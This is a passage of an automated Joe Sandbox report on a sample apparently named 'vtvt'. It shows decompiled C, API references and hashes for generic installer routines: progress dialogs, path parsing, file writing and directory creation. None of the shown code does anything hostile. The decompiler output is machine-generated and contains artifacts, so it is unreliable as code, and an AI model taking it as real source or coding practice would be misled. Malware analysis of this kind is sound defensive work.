                                                                                    0x00406924
                                                                                    0x00406927
                                                                                    0x0040692a
                                                                                    0x0040692f
                                                                                    0x00406931
                                                                                    0x0040693a
                                                                                    0x0040693e
                                                                                    0x0040695b
                                                                                    0x00406963
                                                                                    0x00406963
                                                                                    0x00406968
                                                                                    0x0040696a
                                                                                    0x0040696d
                                                                                    0x00406972
                                                                                    0x00406973
                                                                                    0x00406977
                                                                                    0x00406977
                                                                                    0x00406978
                                                                                    0x0040697f
                                                                                    0x00406981
                                                                                    0x00406988
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406990
                                                                                    0x00406996
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406996
                                                                                    0x0040699b

                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                    • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                    • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-4010320282
                                                                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040302E(intOrPtr _a4) {
                                                                                    				short _v132;
                                                                                    				long _t6;
                                                                                    				struct HWND__* _t7;
                                                                                    				struct HWND__* _t15;
                                                                                    
                                                                                    				if(_a4 != 0) {
                                                                                    					_t15 =  *0x420efc;
                                                                                    					if(_t15 != 0) {
                                                                                    						_t15 = DestroyWindow(_t15);
                                                                                    					}
                                                                                    					 *0x420efc = 0;
                                                                                    					return _t15;
                                                                                    				}
                                                                                    				if( *0x420efc != 0) {
                                                                                    					return E00406A71(0);
                                                                                    				}
                                                                                    				_t6 = GetTickCount();
                                                                                    				if(_t6 >  *0x42a26c) {
                                                                                    					if( *0x42a268 == 0) {
                                                                                    						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                                    						 *0x420efc = _t7;
                                                                                    						return ShowWindow(_t7, 5);
                                                                                    					}
                                                                                    					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                    						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                                    						return E004056CA(0,  &_v132);
                                                                                    					}
                                                                                    				}
                                                                                    				return _t6;
                                                                                    			}







                                                                                    0x0040303d
                                                                                    0x0040303f
                                                                                    0x00403046
                                                                                    0x00403049
                                                                                    0x00403049
                                                                                    0x0040304f
                                                                                    0x00000000
                                                                                    0x0040304f
                                                                                    0x0040305d
                                                                                    0x00000000
                                                                                    0x00403060
                                                                                    0x00403067
                                                                                    0x00403073
                                                                                    0x0040307b
                                                                                    0x004030b9
                                                                                    0x004030c2
                                                                                    0x00000000
                                                                                    0x004030c7
                                                                                    0x00403084
                                                                                    0x00403095
                                                                                    0x00000000
                                                                                    0x004030a3
                                                                                    0x00403084
                                                                                    0x004030cf

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                    • GetTickCount.KERNEL32 ref: 00403067
                                                                                    • wsprintfW.USER32 ref: 00403095
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    • CreateDialogParamW.USER32 ref: 004030B9
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                    • String ID: ... %d%%
                                                                                    • API String ID: 722711167-2449383134
                                                                                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				long _v8;
                                                                                    				signed char _v12;
                                                                                    				unsigned int _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				long _v56;
                                                                                    				void* _v60;
                                                                                    				long _t15;
                                                                                    				unsigned int _t19;
                                                                                    				signed int _t25;
                                                                                    				struct HWND__* _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                    				if(_a8 == 0) {
                                                                                    					L4:
                                                                                    					_v56 = _t15;
                                                                                    					_v60 = 4;
                                                                                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                    					return _v24;
                                                                                    				}
                                                                                    				_t19 = GetMessagePos();
                                                                                    				_v16 = _t19 >> 0x10;
                                                                                    				_v20 = _t19;
                                                                                    				ScreenToClient(_t28,  &_v20);
                                                                                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                                    					_t15 = _v8;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				return _t25 | 0xffffffff;
                                                                                    			}














                                                                                    0x00404f8d
                                                                                    0x00404f9a
                                                                                    0x00404fa0
                                                                                    0x00404fde
                                                                                    0x00404fde
                                                                                    0x00404fed
                                                                                    0x00404ff4
                                                                                    0x00000000
                                                                                    0x00404ff6
                                                                                    0x00404fa2
                                                                                    0x00404fb1
                                                                                    0x00404fb9
                                                                                    0x00404fbc
                                                                                    0x00404fce
                                                                                    0x00404fd4
                                                                                    0x00404fdb
                                                                                    0x00000000
                                                                                    0x00404fdb
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                    • GetMessagePos.USER32 ref: 00404FA2
                                                                                    • ScreenToClient.USER32 ref: 00404FBC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				short _v132;
                                                                                    				void* _t11;
                                                                                    				WCHAR* _t19;
                                                                                    
                                                                                    				if(_a8 == 0x110) {
                                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                                    					_a8 = 0x113;
                                                                                    				}
                                                                                    				if(_a8 == 0x113) {
                                                                                    					_t11 = E00403012();
                                                                                    					_t19 = L"unpacking data: %d%%";
                                                                                    					if( *0x42a270 == 0) {
                                                                                    						_t19 = L"verifying installer: %d%%";
                                                                                    					}
                                                                                    					wsprintfW( &_v132, _t19, _t11);
                                                                                    					SetWindowTextW(_a4,  &_v132);
                                                                                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}






                                                                                    0x00402fa3
                                                                                    0x00402fb1
                                                                                    0x00402fb7
                                                                                    0x00402fb7
                                                                                    0x00402fc5
                                                                                    0x00402fc7
                                                                                    0x00402fd3
                                                                                    0x00402fd8
                                                                                    0x00402fda
                                                                                    0x00402fda
                                                                                    0x00402fe5
                                                                                    0x00402ff5
                                                                                    0x00403007
                                                                                    0x00403007
                                                                                    0x0040300f

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                    • wsprintfW.USER32 ref: 00402FE5
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                    • SetDlgItemTextW.USER32 ref: 00403007
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                    • API String ID: 1451636040-1158693248
                                                                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E00402950(void* __ebx) {
                                                                                    				WCHAR* _t26;
                                                                                    				void* _t29;
                                                                                    				long _t37;
                                                                                    				void* _t49;
                                                                                    				void* _t52;
                                                                                    				void* _t54;
                                                                                    				void* _t56;
                                                                                    				void* _t59;
                                                                                    				void* _t60;
                                                                                    				void* _t61;
                                                                                    
                                                                                    				_t49 = __ebx;
                                                                                    				_t52 = 0xfffffd66;
                                                                                    				_t26 = E00402DA6(0xfffffff0);
                                                                                    				_t55 = _t26;
                                                                                    				 *(_t61 - 0x40) = _t26;
                                                                                    				if(E00405FAE(_t26) == 0) {
                                                                                    					E00402DA6(0xffffffed);
                                                                                    				}
                                                                                    				E00406133(_t55);
                                                                                    				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                                    				 *(_t61 + 8) = _t29;
                                                                                    				if(_t29 != 0xffffffff) {
                                                                                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                    					if( *(_t61 - 0x28) != _t49) {
                                                                                    						_t37 =  *0x42a274;
                                                                                    						 *(_t61 - 0x44) = _t37;
                                                                                    						_t54 = GlobalAlloc(0x40, _t37);
                                                                                    						if(_t54 != _t49) {
                                                                                    							E004035F8(_t49);
                                                                                    							E004035E2(_t54,  *(_t61 - 0x44));
                                                                                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                    							 *(_t61 - 0x10) = _t59;
                                                                                    							if(_t59 != _t49) {
                                                                                    								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                    								while( *_t59 != _t49) {
                                                                                    									_t51 =  *_t59;
                                                                                    									_t60 = _t59 + 8;
                                                                                    									 *(_t61 - 0x3c) =  *_t59;
                                                                                    									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                    									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                    								}
                                                                                    								GlobalFree( *(_t61 - 0x10));
                                                                                    							}
                                                                                    							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                    							GlobalFree(_t54);
                                                                                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                    						}
                                                                                    					}
                                                                                    					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                    					CloseHandle( *(_t61 + 8));
                                                                                    				}
                                                                                    				_t56 = 0xfffffff3;
                                                                                    				if(_t52 < _t49) {
                                                                                    					_t56 = 0xffffffef;
                                                                                    					DeleteFileW( *(_t61 - 0x40));
                                                                                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                    				}
                                                                                    				_push(_t56);
                                                                                    				E00401423();
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                                    				return 0;
                                                                                    			}













                                                                                    0x00402950
                                                                                    0x00402952
                                                                                    0x00402957
                                                                                    0x0040295c
                                                                                    0x0040295f
                                                                                    0x00402969
                                                                                    0x0040296d
                                                                                    0x0040296d
                                                                                    0x00402973
                                                                                    0x00402980
                                                                                    0x00402988
                                                                                    0x0040298b
                                                                                    0x00402997
                                                                                    0x0040299a
                                                                                    0x004029a0
                                                                                    0x004029ae
                                                                                    0x004029b3
                                                                                    0x004029b7
                                                                                    0x004029ba
                                                                                    0x004029c3
                                                                                    0x004029cf
                                                                                    0x004029d3
                                                                                    0x004029d6
                                                                                    0x004029e0
                                                                                    0x004029ff
                                                                                    0x004029e7
                                                                                    0x004029ec
                                                                                    0x004029f4
                                                                                    0x004029f7
                                                                                    0x004029fc
                                                                                    0x004029fc
                                                                                    0x00402a06
                                                                                    0x00402a06
                                                                                    0x00402a13
                                                                                    0x00402a19
                                                                                    0x00402a1f
                                                                                    0x00402a1f
                                                                                    0x004029b7
                                                                                    0x00402a33
                                                                                    0x00402a35
                                                                                    0x00402a35
                                                                                    0x00402a3f
                                                                                    0x00402a40
                                                                                    0x00402a44
                                                                                    0x00402a48
                                                                                    0x00402a4e
                                                                                    0x00402a4e
                                                                                    0x00402a55
                                                                                    0x004022f1
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                    • GlobalFree.KERNEL32 ref: 00402A06
                                                                                    • GlobalFree.KERNEL32 ref: 00402A19
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                    				char _v68;
                                                                                    				char _v132;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t23;
                                                                                    				signed int _t24;
                                                                                    				void* _t31;
                                                                                    				void* _t33;
                                                                                    				void* _t34;
                                                                                    				void* _t44;
                                                                                    				signed int _t46;
                                                                                    				signed int _t50;
                                                                                    				signed int _t52;
                                                                                    				signed int _t53;
                                                                                    				signed int _t55;
                                                                                    
                                                                                    				_t23 = _a16;
                                                                                    				_t53 = _a12;
                                                                                    				_t44 = 0xffffffdc;
                                                                                    				if(_t23 == 0) {
                                                                                    					_push(0x14);
                                                                                    					_pop(0);
                                                                                    					_t24 = _t53;
                                                                                    					if(_t53 < 0x100000) {
                                                                                    						_push(0xa);
                                                                                    						_pop(0);
                                                                                    						_t44 = 0xffffffdd;
                                                                                    					}
                                                                                    					if(_t53 < 0x400) {
                                                                                    						_t44 = 0xffffffde;
                                                                                    					}
                                                                                    					if(_t53 < 0xffff3333) {
                                                                                    						_t52 = 0x14;
                                                                                    						asm("cdq");
                                                                                    						_t24 = 1 / _t52 + _t53;
                                                                                    					}
                                                                                    					_t25 = _t24 & 0x00ffffff;
                                                                                    					_t55 = _t24 >> 0;
                                                                                    					_t46 = 0xa;
                                                                                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                    				} else {
                                                                                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                    					_t50 = 0;
                                                                                    				}
                                                                                    				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                    				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                                    				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                    				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                    				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                    			}



















                                                                                    0x00404e7a
                                                                                    0x00404e7f
                                                                                    0x00404e87
                                                                                    0x00404e88
                                                                                    0x00404e95
                                                                                    0x00404e9d
                                                                                    0x00404e9e
                                                                                    0x00404ea0
                                                                                    0x00404ea2
                                                                                    0x00404ea4
                                                                                    0x00404ea7
                                                                                    0x00404ea7
                                                                                    0x00404eae
                                                                                    0x00404eb4
                                                                                    0x00404eb4
                                                                                    0x00404ebb
                                                                                    0x00404ec2
                                                                                    0x00404ec5
                                                                                    0x00404ec8
                                                                                    0x00404ec8
                                                                                    0x00404ecc
                                                                                    0x00404edc
                                                                                    0x00404ede
                                                                                    0x00404ee1
                                                                                    0x00404e8a
                                                                                    0x00404e8a
                                                                                    0x00404e91
                                                                                    0x00404e91
                                                                                    0x00404ee9
                                                                                    0x00404ef4
                                                                                    0x00404f0a
                                                                                    0x00404f1b
                                                                                    0x00404f37

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                    • wsprintfW.USER32 ref: 00404F1B
                                                                                    • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s$H7B
                                                                                    • API String ID: 3540041739-107966168
                                                                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405B99(WCHAR* _a4) {
                                                                                    				struct _SECURITY_ATTRIBUTES _v16;
                                                                                    				struct _SECURITY_DESCRIPTOR _v36;
                                                                                    				long _t23;
                                                                                    
                                                                                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                    				_v36.Owner = 0x4083f8;
                                                                                    				_v36.Group = 0x4083f8;
                                                                                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                    				_v16.lpSecurityDescriptor =  &_v36;
                                                                                    				_v36.Revision = 1;
                                                                                    				_v36.Control = 4;
                                                                                    				_v36.Dacl = 0x4083e8;
                                                                                    				_v16.nLength = 0xc;
                                                                                    				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                                                                                    					L1:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t23 = GetLastError();
                                                                                    				if(_t23 == 0xb7) {
                                                                                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                    						goto L1;
